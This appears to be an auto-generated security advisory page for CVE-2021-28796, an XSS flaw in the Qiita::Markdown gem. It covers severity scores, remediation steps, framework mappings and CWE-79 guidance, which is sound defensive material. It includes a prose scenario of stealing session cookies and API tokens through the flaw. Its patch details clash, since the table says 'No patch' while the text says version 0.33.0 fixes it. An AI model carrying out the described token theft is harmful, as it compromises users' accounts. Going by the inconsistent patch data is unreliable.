CVE-2021-28796: qiita\ XSS — MEDIUM

CISO Take

Qiita::Markdown before 0.33.0 contains a stored/reflected XSS vulnerability in its transformer pipeline, enabling script injection in rendered content. If your AI/ML documentation platforms, knowledge bases, or developer portals use this gem, upgrade to 0.33.0 immediately. The blast radius is limited to session hijacking and credential theft in browser contexts, but in AI-enabled developer workflows the attack surface extends to poisoning shared knowledge content.

What is the risk?

Medium risk (CVSS 6.1). Low attack complexity with no privileges required makes it trivially weaponizable, but requires user interaction (victim must view/render the malicious markdown). Network-accessible, scope-changed (C:L/I:L) means it can affect browser contexts beyond the immediate application. In AI/ML team environments where Qiita or similar markdown-rendered platforms are used for model documentation, runbooks, or collaborative notebooks, the risk elevates slightly due to shared content consumption patterns.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
qiita\	—	—	No patch

Do you use qiita\? You're affected.

How severe is it?

CVSS 3.1

6.1 / 10

EPSS

0.8%

chance of exploitation in 30 days

Higher than 51% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

No known exploitation

Sophistication

Trivial

What is the attack surface?

AV Network

AC Low

PR None

UI Required

S Changed

C Low

I Low

A None

What should I do?

5 steps

Patch: Upgrade qiita-markdown gem to >= 0.33.0 immediately. Review Gemfile.lock for pinned vulnerable versions.
Audit: Identify all internal systems using this gem via 'bundle list | grep qiita-markdown'.
Validate: Test rendered output with standard XSS payloads post-upgrade to confirm sanitization.
Detect: Review web server/application logs for unusual script tags or javascript: URIs in markdown inputs prior to patching.
Content hygiene: If using Qiita-sourced content in RAG pipelines or knowledge bases, re-sanitize all historical content rendered before the patch.

How is it classified?

Code Execution Data Leakage Social Engineering Framework RAG Plugin AML.T0011.003 - Malicious Link AML.T0049 - Exploit Public-Facing Application AML.T0070 - RAG Poisoning AML.T0078 - Drive-by Compromise

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Art.15 - Accuracy, robustness and cybersecurity

ISO 42001

8.4 - AI system operation and monitoring

NIST AI RMF

GOVERN-6.2 - Organizational teams document the risks and potential impacts of AI systems

OWASP LLM Top 10

LLM07 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2021-28796?

Qiita::Markdown before 0.33.0 contains a stored/reflected XSS vulnerability in its transformer pipeline, enabling script injection in rendered content. If your AI/ML documentation platforms, knowledge bases, or developer portals use this gem, upgrade to 0.33.0 immediately. The blast radius is limited to session hijacking and credential theft in browser contexts, but in AI-enabled developer workflows the attack surface extends to poisoning shared knowledge content.

Is CVE-2021-28796 actively exploited?

No confirmed active exploitation of CVE-2021-28796 has been reported, but organizations should still patch proactively.

How to fix CVE-2021-28796?

1. Patch: Upgrade qiita-markdown gem to >= 0.33.0 immediately. Review Gemfile.lock for pinned vulnerable versions. 2. Audit: Identify all internal systems using this gem via 'bundle list | grep qiita-markdown'. 3. Validate: Test rendered output with standard XSS payloads post-upgrade to confirm sanitization. 4. Detect: Review web server/application logs for unusual script tags or javascript: URIs in markdown inputs prior to patching. 5. Content hygiene: If using Qiita-sourced content in RAG pipelines or knowledge bases, re-sanitize all historical content rendered before the patch.

What systems are affected by CVE-2021-28796?

This vulnerability affects the following AI/ML architecture patterns: Developer documentation portals, RAG pipelines (if ingesting Qiita-rendered content), Model documentation systems, Collaborative ML notebooks.

What is the CVSS score for CVE-2021-28796?

CVE-2021-28796 has a CVSS v3.1 base score of 6.1 (MEDIUM). The EPSS exploitation probability is 0.77%.

What is the AI security impact?

Affected AI Architectures

Developer documentation portalsRAG pipelines (if ingesting Qiita-rendered content)Model documentation systemsCollaborative ML notebooks

MITRE ATLAS Techniques

AML.T0011.003 Malicious Link

AML.T0049 Exploit Public-Facing Application

AML.T0070 RAG Poisoning

AML.T0078 Drive-by Compromise

Compliance Controls Affected

EU AI Act: Art.15

ISO 42001: 8.4

NIST AI RMF: GOVERN-6.2

OWASP LLM Top 10: LLM07

What are the technical details?

Original Advisory

Increments Qiita::Markdown before 0.33.0 allows XSS in transformers.

Exploitation Scenario

An adversary targeting an AI/ML team's internal knowledge base creates a Qiita article or wiki page containing a markdown-embedded XSS payload (e.g., in a transformer-processed block). When a developer or data scientist browses to review model documentation or training notes, the script executes in their browser, stealing session cookies or API tokens. In a RAG pipeline scenario, if the markdown content is fetched and rendered for AI-assisted developer tooling, the payload could execute in the context of that tooling, potentially exfiltrating credentials or hijacking sessions used to access ML platforms.

Weaknesses (CWE)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Primary

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

[Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
[Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca

Source: MITRE CWE corpus.